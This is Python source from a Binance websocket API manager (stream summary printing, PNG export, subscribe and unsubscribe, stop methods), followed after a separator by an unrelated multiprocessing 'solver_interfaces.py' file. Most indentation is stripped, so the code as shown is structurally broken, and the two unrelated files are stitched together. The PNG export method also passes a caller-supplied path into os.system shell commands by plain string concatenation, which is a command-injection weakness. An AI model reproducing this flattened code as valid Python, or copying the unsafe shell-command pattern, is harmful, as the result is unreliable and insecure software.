if self.stream_list[stream_id]["stream_label"] is not None:
stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
if isinstance(stream_info['ping_interval'], int):
ping_interval = f"{stream_info['ping_interval']} seconds"
else:
ping_interval = stream_info['ping_interval']
if isinstance(stream_info['ping_timeout'], int):
ping_timeout = f"{stream_info['ping_timeout']} seconds"
else:
ping_timeout = stream_info['ping_timeout']
if isinstance(stream_info['close_timeout'], int):
close_timeout = f"{stream_info['close_timeout']} seconds"
else:
close_timeout = stream_info['close_timeout']
try:
uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
print(str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
str(add_string) +
" stream_id:", str(stream_id), "\r\n" +
str(stream_label_row) +
" stream_buffer_maxlen:", str(stream_info['stream_buffer_maxlen']), "\r\n" +
" channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
" markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
str(symbol_row) +
" subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
str(payload_row) +
str(status_row) +
str(dex_user_address_row) +
f" ping_interval: {ping_interval}\r\n"
f" ping_timeout: {ping_timeout}\r\n"
f" close_timeout: {close_timeout}\r\n"
" start_time:", str(stream_info['start_time']), "\r\n"
" uptime:", str(uptime),
"since " + str(
datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
"\r\n" +
" reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
str(restart_requests_row) +
str(binance_api_status_row) +
str(last_static_ping_listen_key) +
" last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
" seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
" kill_request:", str(stream_info['kill_request']), "\r\n"
" stop_request:", str(stream_info['stop_request']), "\r\n"
" has_stopped:", str(stream_info['has_stopped']), "\r\n"
" seconds_since_has_stopped:",
str(stream_info['seconds_since_has_stopped']), "\r\n"
" current_receiving_speed:", str(current_receiving_speed), "\r\n" +
" processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
" transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
" stream_most_receives_per_second:",
str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
" stream_receives_per_second:",
str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
" stream_receives_per_minute:",
str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
" stream_receives_per_hour:",
str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
" stream_receives_per_day:",
str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n"
"===============================================================================================\r\n")
except KeyError:
self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False):
"""
Print an overview of all streams
:param add_string: text to add to the output
:type add_string: str
        :param disable_print: set to `True` to return the formatted text instead of printing it
:type disable_print: bool
"""
streams = len(self.stream_list)
active_streams = 0
crashed_streams = 0
restarting_streams = 0
stopped_streams = 0
active_streams_row = ""
restarting_streams_row = ""
stopped_streams_row = ""
all_receives_per_second = 0.0
current_receiving_speed = 0
streams_with_stop_request = 0
stream_rows = ""
crashed_streams_row = ""
binance_api_status_row = ""
received_bytes_per_x_row = ""
streams_with_stop_request_row = ""
stream_buffer_row = ""
highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
f"(reached at " \
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
if len(add_string) > 0:
add_string = " " + str(add_string) + "\r\n"
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError:
return ""
for stream_id in temp_stream_list:
stream_row_color_prefix = ""
stream_row_color_suffix = ""
current_receiving_speed += self.get_current_receiving_speed(stream_id)
stream_statistic = self.get_stream_statistic(stream_id)
if self.stream_list[stream_id]['status'] == "running":
active_streams += 1
all_receives_per_second += stream_statistic['stream_receives_per_second']
try:
if self.restart_requests[stream_id]['status'] == "restarted":
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
try:
for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
if (time.time() - reconnect_timestamp) < 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 2:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif (time.time() - reconnect_timestamp) < 4:
stream_row_color_prefix = "\033[1m\033[32m"
stream_row_color_suffix = "\033[0m"
except KeyError:
pass
elif self.stream_list[stream_id]['status'] == "stopped":
stopped_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif self.stream_list[stream_id]['status'] == "restarting":
restarting_streams += 1
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
elif "crashed" in self.stream_list[stream_id]['status']:
crashed_streams += 1
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
if self.stream_list[stream_id]['stream_label'] is not None:
if len(self.stream_list[stream_id]['stream_label']) > 18:
stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
else:
stream_label = str(self.stream_list[stream_id]['stream_label'])
stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
self.fill_up_space_right(17, stream_label) + "|" + \
self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
+ "|" + stream_row_color_prefix + \
self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
stream_row_color_suffix + "\r\n "
if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
self.stream_list[stream_id]['status'] == "running":
streams_with_stop_request += 1
if streams_with_stop_request >= 1:
stream_row_color_prefix = "\033[1m\033[33m"
stream_row_color_suffix = "\033[0m"
streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
if crashed_streams >= 1:
stream_row_color_prefix = "\033[1m\033[31m"
stream_row_color_suffix = "\033[0m"
crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
+ stream_row_color_suffix + "\r\n"
total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
self.get_human_bytesize(self.get_total_received_bytes())) + ")"
try:
received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2))\
+ " gB)"
if self.get_stream_buffer_length() > 50:
stream_row_color_prefix = "\033[1m\033[34m"
stream_row_color_suffix = "\033[0m"
stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
str(self.get_stream_buffer_length()) + "\r\n"
stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
" (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
stream_row_color_suffix + "\r\n"
if active_streams > 0:
active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
if restarting_streams > 0:
restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
if stopped_streams > 0:
stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
if self.binance_api_status['weight'] is not None:
if self.binance_api_status['status_code'] == 200:
binance_api_status_code = str(self.binance_api_status['status_code'])
elif self.binance_api_status['status_code'] == 418:
binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
else:
binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
"\033[0m"
binance_api_status_row = " binance_api_status: used_weight=" + \
str(self.binance_api_status['weight']) + \
", status_code=" + str(binance_api_status_code) + " (last update " + \
str(datetime.utcfromtimestamp(
self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
")\r\n"
try:
print_text = (
str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
" exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
" uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
" streams: " + str(streams) + "\r\n" +
str(active_streams_row) +
str(crashed_streams_row) +
str(restarting_streams_row) +
str(stopped_streams_row) +
str(streams_with_stop_request_row) +
" subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
str(stream_buffer_row) +
" current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
" average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
" highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
" total_receives: " + str(self.total_receives) + "\r\n"
" total_received_bytes: " + str(total_received_bytes) + "\r\n"
" total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
" stream_buffer_maxlen: " + str(self.stream_buffer_maxlen) + "\r\n" +
str(binance_api_status_row) +
" process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
"\r\n" + str(add_string) +
" ---------------------------------------------------------------------------------------------\r\n"
" stream_id | stream_label | last | average | peak | recon\r\n"
" ---------------------------------------------------------------------------------------------\r\n"
" " + str(stream_rows) +
"---------------------------------------------------------------------------------------------\r\n"
" all_streams |" +
self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
self.fill_up_space_left(8, self.reconnects) + "\r\n" +
"===============================================================================================\r\n"
)
if disable_print:
                    if sys.platform.startswith('win'):  # sys.platform is 'win32' on Windows
print_text = self.remove_ansi_escape_codes(print_text)
return print_text
else:
print(print_text)
except UnboundLocalError:
pass
except ZeroDivisionError:
pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
"""
Create a PNG image file with the console output of `print_summary()`
*LINUX ONLY* It should not be hard to make it OS independent:
https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/61
:param print_summary_export_path: If you want to export the output of print_summary() to an image,
please provide a path like "/var/www/html/". `View the Wiki!
<https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
:type print_summary_export_path: str
        :param hight_per_row: set the height per row for the image height calculation
:type hight_per_row: int
:return: bool
"""
print_text = self.print_summary(disable_print=True)
# Todo:
# 1. Handle paths right
# 2. Use PythonMagick instead of Linux ImageMagick
with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
print(self.remove_ansi_escape_codes(print_text), file=text_file)
try:
image_hight = print_text.count("\n") * hight_per_row + 15
except AttributeError:
return False
os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
'+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
print_summary_export_path + 'print_summary_plain.png')
os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
'-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
'"$(date)" ' + print_summary_export_path + 'print_summary.png')
return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
        Remove ANSI escape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
stream_id,
new_channels,
new_markets,
new_stream_label=None,
new_stream_buffer_name=False,
new_api_key=False,
new_api_secret=False,
new_symbols=False,
new_output="raw_data",
new_ping_interval=20,
new_ping_timeout=20,
new_close_timeout=10,
new_stream_buffer_maxlen=None):
"""
Replace a stream
        If you want to start a stream with a new config, it is recommended to first start a new stream with the new
        settings and to close the old stream only after the new stream has received its first data. This way your data
        stays consistent.
:param stream_id: id of the old stream
:type stream_id: uuid
:param new_channels: the new channel list for the stream
:type new_channels: str, tuple, list, set
:param new_markets: the new markets list for the stream
:type new_markets: str, tuple, list, set
:param new_stream_label: provide a stream_label to identify the stream
:type new_stream_label: str
:param new_stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type new_stream_buffer_name: bool or str
:param new_api_key: provide a valid Binance API key
:type new_api_key: str
:param new_api_secret: provide a valid Binance API secret
:type new_api_secret: str
:param new_symbols: provide the symbols for isolated_margin user_data streams
:type new_symbols: str
:param new_output: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to convert
with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise the output
remains unchanged and gets delivered as received from the endpoints
:type new_output: str
:param new_ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_interval: int or None
:param new_ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_ping_timeout: int or None
:param new_close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type new_close_timeout: int or None
        :param new_stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non-generic
                                     `stream_buffer`. The generic `stream_buffer` always uses the value given to
                                     `BinanceWebSocketApiManager()`.
:type new_stream_buffer_maxlen: int or None
:return: new_stream_id or 'False'
"""
# starting a new socket and stop the old stream not before the new stream received its first record
new_stream_id = self.create_stream(new_channels,
new_markets,
new_stream_label,
new_stream_buffer_name,
new_api_key,
new_api_secret,
new_symbols,
new_output,
new_ping_interval,
new_ping_timeout,
new_close_timeout,
new_stream_buffer_maxlen)
if self.wait_till_stream_has_started(new_stream_id):
self.stop_stream(stream_id)
return new_stream_id
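    # Hedged usage sketch (assumption): replacing a running stream with a new
    # channel/market set. `manager` and `old_stream_id` are placeholders.
    #
    #   new_id = manager.replace_stream(old_stream_id,
    #                                   new_channels=['trade'],
    #                                   new_markets=['btcusdt', 'ethusdt'],
    #                                   new_stream_label='trades_v2')
    #   print(f"stream {old_stream_id} replaced by {new_id}")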
def run(self):
"""
        This method overrides `threading.Thread.run()` and starts management threads
"""
thread_frequent_checks = threading.Thread(target=self._frequent_checks)
thread_frequent_checks.start()
thread_keepalive_streams = threading.Thread(target=self._keepalive_streams)
thread_keepalive_streams.start()
def set_private_dex_config(self, binance_dex_user_address):
"""
Set binance_dex_user_address
        This becomes the default user_address. Once the websocket is created with this default value, it is not possible
        to change it. If you plan to use different user addresses, it is recommended not to use this method; just provide
        the user_address via the market parameter of create_stream().
:param binance_dex_user_address: Binance DEX user address
:type binance_dex_user_address: str
"""
self.dex_user_address = binance_dex_user_address
def set_heartbeat(self, stream_id):
"""
Set heartbeat for a specific thread (should only be done by the stream itself)
"""
logging.debug("BinanceWebSocketApiManager.set_heartbeat(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['last_heartbeat'] = time.time()
self.stream_list[stream_id]['status'] = "running"
except KeyError:
pass
def set_ringbuffer_error_max_size(self, max_size):
"""
How many error messages should be kept in the ringbuffer?
:param max_size: Max entries of error messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_error_max_size = int(max_size)
def set_ringbuffer_result_max_size(self, max_size):
"""
How many result messages should be kept in the ringbuffer?
:param max_size: Max entries of result messages in the ringbuffer.
:type max_size: int
:return: bool
"""
self.ringbuffer_result_max_size = int(max_size)
def set_stream_label(self, stream_id, stream_label=None):
"""
Set a stream_label by stream_id
:param stream_id: id of the stream
:type stream_id: uuid
:param stream_label: stream_label to set
:type stream_label: str
"""
self.stream_list[stream_id]['stream_label'] = stream_label
def set_keep_max_received_last_second_entries(self, number_of_max_entries):
"""
        Set how many received_last_second entries are stored before they get deleted!
:param number_of_max_entries: number of entries to keep in list
:type number_of_max_entries: int
"""
self.keep_max_received_last_second_entries = number_of_max_entries
def set_restart_request(self, stream_id):
"""
Set a restart request for a specific stream
:param stream_id: id of the old stream
:type stream_id: uuid
"""
self.restart_requests[stream_id] = {'status': "new"}
return True
def split_payload(self, params, method, max_items_per_request=350):
"""
        Sending more than 8000 chars via websocket.send() leads to a connection loss; 350 list elements is a good limit
        to keep the payload length under 8000 chars and avoid reconnects.
:param params: params of subscribe payload
:type params: list
:param method: SUBSCRIBE or UNSUBSCRIBE
:type method: str
        :param max_items_per_request: max size for params; if there are more, the payload gets split
:return: list or False
"""
if self.is_exchange_type('cex'):
count_items = 0
add_params = []
payload = []
for param in params:
add_params.append(param)
count_items += 1
                if count_items >= max_items_per_request:  # keep each request at or below the limit
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
count_items = 0
add_params = []
if len(add_params) > 0:
add_payload = {"method": method,
"params": add_params,
"id": self.get_request_id()}
payload.append(add_payload)
return payload
else:
return False
elif self.is_exchange_type('dex'):
pass
else:
return False
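    # Hedged illustration (assumption): how split_payload() chunks a large subscribe
    # request. With 800 params and the default limit of 350, the method would return
    # three payload dicts, each with its own request id. The param strings below are
    # placeholders only.
    #
    #   params = [f"btcusdt@depth{i}" for i in range(800)]
    #   payloads = manager.split_payload(params, "SUBSCRIBE")
    #   # -> [{'method': 'SUBSCRIBE', 'params': [...], 'id': ...}, ...]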
def start_monitoring_api(self, host='127.0.0.1', port=64201, warn_on_update=True):
"""
Start the monitoring API server
Take a look into the
`Wiki <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/UNICORN-Monitoring-API-Service>`_
to see how this works!
:param host: listening ip address, use 0.0.0.0 or a specific address (default: 127.0.0.1)
:type host: str
:param port: listening port number (default: 64201)
:type port: int
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
"""
thread = threading.Thread(target=self._start_monitoring_api_thread, args=(host, port, warn_on_update))
thread.start()
return True
def stop_manager_with_all_streams(self):
"""
Stop the BinanceWebSocketApiManager with all streams and management threads
"""
logging.info("BinanceWebSocketApiManager.stop_manager_with_all_streams() - Stopping "
"unicorn_binance_websocket_api_manager " + self.version + " ...")
# send signal to all threads
self.stop_manager_request = True
# delete listenKeys
for stream_id in self.stream_list:
self.stop_stream(stream_id)
# stop monitoring API services
self.stop_monitoring_api()
def stop_monitoring_api(self):
"""
Stop the monitoring API service
:return: bool
"""
try:
if not isinstance(self.monitoring_api_server, bool):
self.monitoring_api_server.stop()
return True
except AttributeError as error_msg:
logging.info("BinanceWebSocketApiManager.stop_monitoring_api() - can not execute "
"self.monitoring_api_server.stop() - info: " + str(error_msg))
return False
def stop_stream(self, stream_id):
"""
Stop a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.info("BinanceWebSocketApiManager.stop_stream(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
self.delete_listen_key_by_stream_id(stream_id)
try:
self.stream_list[stream_id]['stop_request'] = True
except KeyError:
return False
return True
def stop_stream_as_crash(self, stream_id):
"""
Stop a specific stream with 'crashed' status
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# stop a specific stream by stream_id
logging.critical("BinanceWebSocketApiManager.stop_stream_as_crash(" + str(stream_id) + ")")
try:
del self.restart_requests[stream_id]
except KeyError:
pass
try:
self.stream_list[stream_id]['crash_request'] = True
except KeyError:
return False
def stream_is_crashing(self, stream_id, error_msg=False):
"""
        If a stream can not heal itself because of a wrong parameter (wrong market or channel type), it calls this method
:param stream_id: id of a stream
:type stream_id: uuid
:param error_msg: Error msg to add to the stream status!
:type error_msg: str
"""
logging.critical("BinanceWebSocketApiManager.stream_is_crashing(" + str(stream_id) + ")")
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "crashed"
if error_msg:
self.stream_list[stream_id]['status'] += " - " + str(error_msg)
def stream_is_stopping(self, stream_id):
"""
        Streams use this call to report their shutdown
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
logging.info("BinanceWebSocketApiManager.stream_is_stopping(" + str(stream_id) + ")")
try:
self.stream_list[stream_id]['has_stopped'] = time.time()
self.stream_list[stream_id]['status'] = "stopped"
return True
except KeyError:
return False
    def subscribe_to_stream(self, stream_id, channels=None, markets=None):
"""
Subscribe channels and/or markets to an existing stream
If you provide one channel and one market, then every subscribed market is going to get added to the new channel
and all subscribed channels are going to get added to the new market!
        See `How are the parameters channels and markets used with subscriptions?
        <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
        if channels is None:
            channels = []
        if markets is None:
            markets = []
        try:
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(channels) is set:
channels = list(channels)
if type(markets) is set:
markets = list(markets)
except KeyError:
logging.error("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") KeyError: setting a restart request for this stream ...")
self.stream_is_stopping(stream_id)
self.set_restart_request(stream_id)
return False
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
if type(self.stream_list[stream_id]['channels']) is set:
self.stream_list[stream_id]['channels'] = list(self.stream_list[stream_id]['channels'])
if type(self.stream_list[stream_id]['markets']) is set:
self.stream_list[stream_id]['markets'] = list(self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['channels'] = list(set(self.stream_list[stream_id]['channels'] + channels))
markets_new = []
for market in markets:
if "!" in market \
or market == "allMiniTickers" \
or market == "allTickers" \
or market == "blockheight" \
or market == "$all":
markets_new.append(market)
else:
if self.is_exchange_type('dex'):
markets_new.append(str(market).upper())
elif self.is_exchange_type('cex'):
markets_new.append(str(market).lower())
self.stream_list[stream_id]['markets'] = list(set(self.stream_list[stream_id]['markets'] + markets_new))
payload = self.create_payload(stream_id, "subscribe",
channels=self.stream_list[stream_id]['channels'],
markets=self.stream_list[stream_id]['markets'])
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
# control subscription limit:
# https://github.com/binance-exchange/binance-official-api-docs/blob/5fccfd572db2f530e25e302c02be5dec12759cf9/CHANGELOG.md#2020-04-23
if self.stream_list[stream_id]['subscriptions'] > self.max_subscriptions_per_stream:
self.stop_stream_as_crash(stream_id)
error_msg = "The limit of " + str(self.max_subscriptions_per_stream) + " subscriptions per stream has " \
"been exceeded!"
logging.critical(f"BinanceWebSocketApiManager.subscribe_to_stream({str(stream_id)}) "
f"Info: {str(error_msg)}")
self.stream_is_crashing(stream_id, error_msg)
if self.throw_exception_if_unrepairable:
raise StreamRecoveryError("stream_id " + str(stream_id) + ": " + str(error_msg))
return False
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
logging.info("BinanceWebSocketApiManager.subscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
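    # Hedged usage sketch (assumption): adding channels/markets to a running stream.
    # `manager` and `stream_id` are placeholders; every already subscribed market is
    # combined with the new channel and vice versa, as described in the docstring above.
    #
    #   manager.subscribe_to_stream(stream_id,
    #                               channels=['kline_1m'],
    #                               markets=['bnbusdt'])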
def unsubscribe_from_stream(self, stream_id, channels=None, markets=None):
"""
        Unsubscribe channels and/or markets from an existing stream
If you provide one channel and one market, then all subscribed markets from the specific channel and all
subscribed channels from the specific markets are going to be removed!
        See `How are the parameters channels and markets used with subscriptions?
        <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.create_stream>`_
:param stream_id: id of a stream
:type stream_id: uuid
:param channels: provide the channels you wish to stream
:type channels: str, tuple, list, set
:param markets: provide the markets you wish to stream
:type markets: str, tuple, list, set
:return: bool
"""
logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") started ...")
if markets is None:
markets = []
if channels is None:
channels = []
if type(channels) is str:
channels = [channels]
if type(markets) is str:
markets = [markets]
if type(self.stream_list[stream_id]['channels']) is str:
self.stream_list[stream_id]['channels'] = [self.stream_list[stream_id]['channels']]
if type(self.stream_list[stream_id]['markets']) is str:
self.stream_list[stream_id]['markets'] = [self.stream_list[stream_id]['markets']]
for channel in channels:
try:
self.stream_list[stream_id]['channels'].remove(channel)
except ValueError:
pass
for i in range(len(markets)):
markets[i] = markets[i].lower()
for market in markets:
if re.match(r'[a-zA-Z0-9]{41,43}', market) is None:
try:
self.stream_list[stream_id]['markets'].remove(market)
except ValueError:
pass
payload = self.create_payload(stream_id, "unsubscribe",
channels=channels, markets=markets)
for item in payload:
self.stream_list[stream_id]['payload'].append(item)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
logging.info("BinanceWebSocketApiManager.unsubscribe_to_stream(" + str(stream_id) + ", " + str(channels) +
", " + str(markets) + ") finished ...")
return True
def wait_till_stream_has_started(self, stream_id):
"""
        Returns `True` as soon as a specific stream has started
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
# will return `True` as soon the stream received the first data row
try:
while self.stream_list[stream_id]['last_heartbeat'] is None:
time.sleep(0.1)
return True
except KeyError:
return False
def wait_till_stream_has_stopped(self, stream_id):
"""
        Returns `True` as soon as a specific stream has stopped itself
:param stream_id: id of a stream
:type stream_id: uuid
:return: bool
"""
try:
while self.stream_list[stream_id]['has_stopped'] is False:
time.sleep(0.1)
return True
except KeyError:
return False
|
solver_interfaces.py
|
import threading
import os
import socket
import sys
try:
from SimpleXMLRPCServer import (SimpleXMLRPCServer,
SimpleXMLRPCRequestHandler)
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
# Python 3.x
from xmlrpc.server import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
from http.server import SimpleHTTPRequestHandler
from multiprocessing.managers import BaseManager, BaseProxy
def get_authkey_bytes(authkey):
if isinstance(authkey, bytes):
return authkey
else:
return authkey.encode('utf-8')
class MultiprocessingInterface(BaseManager):
""" A multiprocessing interface to the solver controller
This object exports a controller instance proxy over the multiprocessing
interface. Control actions can be performed by connecting to the interface
and calling methods on the controller proxy instance """
def __init__(self, address=None, authkey=None):
authkey = get_authkey_bytes(authkey)
super().__init__(address, authkey)
self.authkey = authkey
self._server = None
def stop(self):
if self._server:
conn = self._Client(self._address, authkey=self._authkey)
try:
self._server.shutdown(conn)
finally:
conn.close()
elif hasattr(self, 'shutdown'):
self.shutdown()
def get_controller(self):
return self.controller
def start(self, controller):
self.controller = controller
self.register('get_controller', self.get_controller)
        if sys.platform == 'win32':
            # The overridden start() expects a controller argument, so call
            # BaseManager.start() to spawn the manager's server process instead.
            super().start()
else:
self._server = self.get_server()
self._server.serve_forever()
class MultiprocessingClient(BaseManager):
""" A client for the multiprocessing interface
Override the run() method to do appropriate actions on the proxy
instance of the controller object or add an interface using the
add_interface methods similar to the Controller.add_interface method """
def __init__(self, address=None, authkey=None, serializer='pickle',
start=True):
authkey = get_authkey_bytes(authkey)
BaseManager.__init__(self, address, authkey, serializer)
if start:
self.start()
def start(self, connect=True):
self.interfaces = []
# to work around a python caching bug
# http://stackoverflow.com/questions/3649458/broken-pipe-when-using-python-multiprocessing-managers-basemanager-syncmanager
if self.address in BaseProxy._address_to_local:
del BaseProxy._address_to_local[self.address][0].connection
self.register('get_controller')
if connect:
self.connect()
self.controller = self.get_controller()
self.run(self.controller)
@staticmethod
def is_available(address):
try:
socket.create_connection(address, 1).close()
return True
except socket.error:
return False
def run(self, controller):
pass
